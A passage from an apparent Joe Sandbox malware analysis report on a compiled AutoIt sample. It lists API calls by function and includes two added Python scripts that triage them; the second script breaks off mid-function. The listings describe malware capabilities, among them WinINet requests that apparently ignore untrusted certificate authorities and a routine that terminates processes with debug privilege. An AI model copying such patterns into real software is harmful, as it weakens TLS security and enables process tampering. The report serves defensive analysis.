  • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
• lstrcmpiW.KERNEL32(?,?), ref: 007F75CA
• _wcscmp.LIBCMT ref: 007F75E2
• MoveFileW.KERNEL32(?,?), ref: 007F75FB
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 7f8e0594eb7d746545d4180dc6df87d963cf693b7f2d5d3548a422601a50c6ef
• Instruction ID: cadc688e426bf28690ab39bc940387feb1707b67a186e16fff9c5bda2d26067b
• Opcode Fuzzy Hash: 7f8e0594eb7d746545d4180dc6df87d963cf693b7f2d5d3548a422601a50c6ef
• Instruction Fuzzy Hash: 0D5124B290921D9EDF54EB94D845DED73BCAF48310F00459AF605E3241EA7897C5CB70
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 007CEAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 007CEB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 0082DC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 0082DCF2
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 1c97ef1669a51848f018428f72834d9e70bb34603c373679d4b8cc94fa2605df
• Instruction ID: deba578d313515c13c790686c925f26a6e041a9ad3b37e9c04a40f8aa08f0028
• Opcode Fuzzy Hash: 1c97ef1669a51848f018428f72834d9e70bb34603c373679d4b8cc94fa2605df
• Instruction Fuzzy Hash: 4741C5F1209780DADB394F28AD8DF7A7B96FB95304F19480DF18786A61D778AC80D711
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB26C
• HeapAlloc.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB288
• GetCurrentProcess.KERNEL32(?,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB290
• DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB2A3
• GetCurrentProcess.KERNEL32(007EAEF1,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB2AB
• DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB2AE
• CreateThread.KERNEL32(00000000,00000000,007EB2D4,00000000,00000000,00000000), ref: 007EB2C8
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 7708864df5a885be196a9261698c2bc2f19013cceb76c82ac3c3cd56d0a5cebf
• Instruction ID: 4ace77394e0b2baf3121259368176276836daa409fabe2807956040f695bed56
• Opcode Fuzzy Hash: 7708864df5a885be196a9261698c2bc2f19013cceb76c82ac3c3cd56d0a5cebf
• Instruction Fuzzy Hash: E901BFB6640344BFEB10ABA5EC49F5B7BACFB88711F014415FA05DB2A1D6749C00CB61
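Three of the function listings above carry the detail a triage analyst wants pulled out of a report like this: the WinINet routine calls InternetSetOptionW with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS) and then HttpQueryInfoW with 0x5 (HTTP_QUERY_CONTENT_LENGTH), the launcher routine resolves the system and current directories before CreateProcessW, and the helper at 007EB26C duplicates handles and immediately starts a thread. The script below is an added example, not part of the Joe Sandbox report or of the AutoIt runtime the sample is built on: it parses the "APIs" listing format used on this page, resolves the hard-coded WinINet constants and emits one finding per pattern. It assumes that the 0x100 shown in the third InternetSetOptionW slot is the DWORD the routine writes into the option buffer (the real parameter is a pointer, so that reading must be confirmed in the disassembly; if it holds, 0x100 is SECURITY_FLAG_IGNORE_UNKNOWN_CA, which makes the request accept certificates from untrusted CAs). The block labels are chosen here; the report does not name these functions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: "APIs" lines copied from three function blocks of this
# report. Labels are chosen here for readability; Joe Sandbox does not name
# these functions.
SAMPLE_BLOCKS: Dict[str, str] = {
    "wininet_request": """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008045FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0080462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0080466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00804682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0080468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008046BF
• InternetCloseHandle.WININET(00000000), ref: 00804706
  • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
""",
    "create_process": """\
• _memset.LIBCMT ref: 008124F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00812688
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008126EC
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0081286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008128A1
• CloseHandle.KERNEL32(?), ref: 008128D0
""",
    "dup_handle_thread": """\
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007EAEF1,00000B00,?,?), ref: 007EB26C
• HeapAlloc.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007EAEF1,00000B00,?,?), ref: 007EB288
• DuplicateHandle.KERNEL32(00000000,?,007EAEF1,00000B00,?,?), ref: 007EB293
• CreateThread.KERNEL32(00000000,00000000,007EB2D4,00000000,00000000,00000000), ref: 007EB2C8
""",
}

# One "• Name.MODULE(args), ref: ADDR" line. The "Part of subcall function"
# prefix marks calls the IDA plugin attributes to a callee of the function.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]  # None where the plugin printed '?' (runtime-only value)
    ref: str
    subcall: Optional[str] = None


def parse_block(text: str) -> List[Call]:
    """Turn one function's APIs listing into Call records; non-API lines are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(Call(m.group("name"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


# WinINet constants from wininet.h; fixed values, not taken from the report.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
HTTP_QUERY_CONTENT_LENGTH = 0x05
TLS_IGNORE_FLAGS = {
    "SECURITY_FLAG_IGNORE_REVOCATION": 0x0080,
    "SECURITY_FLAG_IGNORE_UNKNOWN_CA": 0x0100,
    "SECURITY_FLAG_IGNORE_WRONG_USAGE": 0x0200,
    "SECURITY_FLAG_IGNORE_CERT_CN_INVALID": 0x1000,
    "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID": 0x2000,
}


def analyse(calls: List[Call]) -> List[str]:
    """Triage rules over one function's call list; each finding names the ref address."""
    findings: List[str] = []
    names = {c.name for c in calls}
    for c in calls:
        a = c.args
        if c.name == "InternetSetOptionW" and len(a) >= 3 and a[1] == INTERNET_OPTION_SECURITY_FLAGS:
            # ASSUMPTION: the listing's third slot is the DWORD stored in the option buffer.
            # The real parameter is a pointer, so confirm the stored value in the disassembly.
            weak = [n for n, bit in TLS_IGNORE_FLAGS.items() if a[2] is not None and a[2] & bit]
            if weak:
                findings.append(f"{c.ref}: InternetSetOptionW(INTERNET_OPTION_SECURITY_FLAGS) "
                                f"sets {'|'.join(weak)}: TLS certificate validation weakened")
        if c.name == "HttpQueryInfoW" and len(a) >= 2 and a[1] == HTTP_QUERY_CONTENT_LENGTH:
            findings.append(f"{c.ref}: HttpQueryInfoW(HTTP_QUERY_CONTENT_LENGTH): sizes a response body, "
                            "consistent with a file download routine")
        if c.name == "CreateProcessW":
            findings.append(f"{c.ref}: CreateProcessW with {a.count(None)} runtime-resolved arguments: "
                            "child process launch, command line not visible statically")
    if {"DuplicateHandle", "CreateThread"} <= names:
        findings.append("DuplicateHandle and CreateThread in one routine: handles are handed to a new thread")
    return findings


def triage(blocks: Dict[str, str]) -> Dict[str, List[str]]:
    return {label: analyse(parse_block(text)) for label, text in blocks.items()}


if __name__ == "__main__":
    for label, found in triage(SAMPLE_BLOCKS).items():
        print(label)
        for f in found:
            print("  -", f)
```

Run it on the text of any function block copied from the report; only lines in the "• Name.MODULE(...), ref: ADDR" shape are parsed, so the Memory Dump Source and Similarity lines can be pasted along with them. A `?` argument means the IDA plugin could not resolve the value statically, which is why the CreateProcessW command line is reported as unknown rather than guessed.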
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: c324c9fd4a4bc6f8c3d04e91b58074a76d8fdbae7223809f41f2e57e3a57927c
                                                                              • Instruction ID: 1fd463e9ef12d5e86ff256b6eb4ab2d70d7dfb13d34b0012294224169d7ef9c9
                                                                              • Opcode Fuzzy Hash: c324c9fd4a4bc6f8c3d04e91b58074a76d8fdbae7223809f41f2e57e3a57927c
                                                                              • Instruction Fuzzy Hash: 86E1BF71A00219ABDF50DFA8DC85AAE77B5FF48314F148229F905EB2C1D774AD41CB94
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-625585964
                                                                              • Opcode ID: 15f3e184546369596d15e82698f99c543d58034b27e20cd9e42569da69fd447d
                                                                              • Instruction ID: 461a4e0df9e8bbe7bf34ab52aa2db34a38410f6fadf55c42240bd538c74c6999
                                                                              • Opcode Fuzzy Hash: 15f3e184546369596d15e82698f99c543d58034b27e20cd9e42569da69fd447d
                                                                              • Instruction Fuzzy Hash: 6B918E71A00219ABDF64CFA4DC48FAEB7B8FF85714F10855AF915EB280DB749940CBA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00819B19
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00819B2D
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00819B47
                                                                              • _wcscat.LIBCMT ref: 00819BA2
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00819BB9
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00819BE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: fa43f23783d0a482920e62db25942f15ab0abe4b49628bb5cefbac3e76495ed0
                                                                              • Instruction ID: ceb19adac1c050151f5ae7634feb911444e96b19cc6a66064bcb61a184f80612
                                                                              • Opcode Fuzzy Hash: fa43f23783d0a482920e62db25942f15ab0abe4b49628bb5cefbac3e76495ed0
                                                                              • Instruction Fuzzy Hash: A3419E70900318ABDB219FA4D889BEA77ACFF08350F10482AF589E7291D6759D848B60
                                                                              APIs
                                                                                • Part of subcall function 007F6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
                                                                                • Part of subcall function 007F6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
                                                                                • Part of subcall function 007F6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007F65F9
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0081179A
                                                                              • GetLastError.KERNEL32 ref: 008117AD
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008117D9
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00811855
                                                                              • GetLastError.KERNEL32(00000000), ref: 00811860
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00811895
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 41b3269de1f9fc08cfdc8cc48d69b6f1c320f3b7b1afae06c40c9dd1fe502434
                                                                              • Instruction ID: 8d8d66ec135e47f0eac7a2986aa8a096a18488d0df2809a97caecc7edf4dcead
                                                                              • Opcode Fuzzy Hash: 41b3269de1f9fc08cfdc8cc48d69b6f1c320f3b7b1afae06c40c9dd1fe502434
                                                                              • Instruction Fuzzy Hash: 4F41AC72600204EFDB15EF54C899FAEB7A5BF44300F048469FA069F3D2DB78A9418B51
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 007F58B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: 110618f9320a9a62cb6093f8dfc3fb3991c0277727088262a4e83892f49fbea3
                                                                              • Instruction ID: c0dbcae8c2bb886f5ac9a5a2593548e4196d72ead219507890d6c73c7e14178c
                                                                              • Opcode Fuzzy Hash: 110618f9320a9a62cb6093f8dfc3fb3991c0277727088262a4e83892f49fbea3
                                                                              • Instruction Fuzzy Hash: 0F110D3160974AFAE7015B54DC82DBA27ACEF25364F30003BF751E5381E7ACAA1042A4
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007FA806
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafeVartype
                                                                              • String ID:
                                                                              • API String ID: 1725837607-0
                                                                              • Opcode ID: 8acd6877ce3ae3b442954e3c105e2cd4188431fd6d789d07a6a42ff3805080fd
                                                                              • Instruction ID: cb47832c15ab40aa2e475454072f6c2cdd266de64ad138e526e3a4711a2b6589
                                                                              • Opcode Fuzzy Hash: 8acd6877ce3ae3b442954e3c105e2cd4188431fd6d789d07a6a42ff3805080fd
                                                                              • Instruction Fuzzy Hash: 1BC17CB5A0420AEFDB04DF98D485BBEB7B4FF08311F208469E619E7341D778AA45CB91
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007F6B63
                                                                              • LoadStringW.USER32(00000000), ref: 007F6B6A
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007F6B80
                                                                              • LoadStringW.USER32(00000000), ref: 007F6B87
                                                                              • _wprintf.LIBCMT ref: 007F6BAD
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007F6BCB
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 007F6BA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: bed1469b76402af3d8787a007566c66820e9bd91acd7292ef5911170b1b009bc
                                                                              • Instruction ID: fae6816ac31a0c79ed88ffec702aaf65a626ab010d6caea0008d270ec461f0a3
                                                                              • Opcode Fuzzy Hash: bed1469b76402af3d8787a007566c66820e9bd91acd7292ef5911170b1b009bc
                                                                              • Instruction Fuzzy Hash: C50136F6900318BFEB11A7D4AD89EFB776CE704304F004895B745D2141EA749E848F74
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00812BF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharConnectRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 2595220575-0
                                                                              • Opcode ID: 831ca4f5b40a2ec257528d29ad8b860771e32a3b39013735c990af07ca6f851b
                                                                              • Instruction ID: 433184785fa5f9333471b4f75dfdf3f862057da982271fad1a49be7e75c035b2
                                                                              • Opcode Fuzzy Hash: 831ca4f5b40a2ec257528d29ad8b860771e32a3b39013735c990af07ca6f851b
                                                                              • Instruction Fuzzy Hash: B5916671204204DFCB15EF14D895FAEB7E9FF88310F04881DF9969B2A2DB34A995CB42
                                                                              APIs
                                                                              • select.WSOCK32 ref: 00809691
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0080969E
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008096C8
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008096E9
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008096F8
                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 008097AA
                                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0084DC00), ref: 00809765
                                                                                • Part of subcall function 007ED2FF: _strlen.LIBCMT ref: 007ED309
                                                                              • _strlen.LIBCMT ref: 00809800
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                              • String ID:
                                                                              • API String ID: 3480843537-0
                                                                              • Opcode ID: b3074bc4efac345476b0f5be2b0c581520d318899b8f2e9ac95b4e64f01ed918
                                                                              • Instruction ID: 494fe5ad4667001ce6c56cf9172f56492fe7d2d788aa8b8e1d8a2892741a0333
                                                                              • Opcode Fuzzy Hash: b3074bc4efac345476b0f5be2b0c581520d318899b8f2e9ac95b4e64f01ed918
                                                                              • Instruction Fuzzy Hash: E4819B71504240ABC714EF64CC89FABB7A8FF89714F104A2DF5959B2A2EB34D904CB92
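Two of the records above deserve a closer look in a listing this long: the process-killing routine whose first call site is 0081179A (Toolhelp snapshot and Process32FirstW in a subcall, then OpenProcess and TerminateProcess, with the SeDebugPrivilege string attached), and the Winsock routine starting at 00809691, whose `#17.WSOCK32` line is an import by ordinal rather than by name. The script below is an added example written for this report; it is not Joe Sandbox code and not code from the analysed binary. It parses records in the layout shown on this page (APIs, Strings and Similarity sections), resolves ordinal imports through an assumed wsock32.dll/ws2_32.dll ordinal table (confirm it against the DLL's export directory, for instance with `dumpbin /exports ws2_32.dll`; under that table ordinal 17 is recvfrom, which together with select, inet_ntoa and htons reads as a datagram receive), and tags each record with capability labels of the example's own choosing. The `SAMPLE` text is constructed from the two records, with their memory-dump lines trimmed. One caveat when reading such tags: the error strings elsewhere in this listing, such as `%s (%d) : ==> %s: %s %s` and `Incorrect Object type in FOR..IN loop`, are AutoIt3 runtime messages, so these functions are interpreter built-ins that every compiled AutoIt executable carries; a tag on them describes what the runtime can do, and the decompiled script, not this listing, shows what the sample actually invokes.

```python
"""Parse Joe Sandbox function records (APIs / Strings / Similarity) and tag
them with capabilities.  Added example, not Joe Sandbox code and not code from
the analysed binary; the record layout, the rule set and the wsock32/ws2_32
ordinal table are assumptions (verify the ordinals with `dumpbin /exports`)."""
import re

# Assumed ordinal table for wsock32.dll / ws2_32.dll, ordinals 1-23 only.
WSOCK32_ORDINALS = dict(enumerate((
    "accept bind closesocket connect getpeername getsockname getsockopt htonl "
    "htons inet_addr inet_ntoa ioctlsocket listen ntohl ntohs recv recvfrom "
    "select send sendto setsockopt shutdown socket").split(), start=1))

# One API line: optional "Part of subcall function X: ", Name.MODULE(args), ref
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def normalize_api(name, module):
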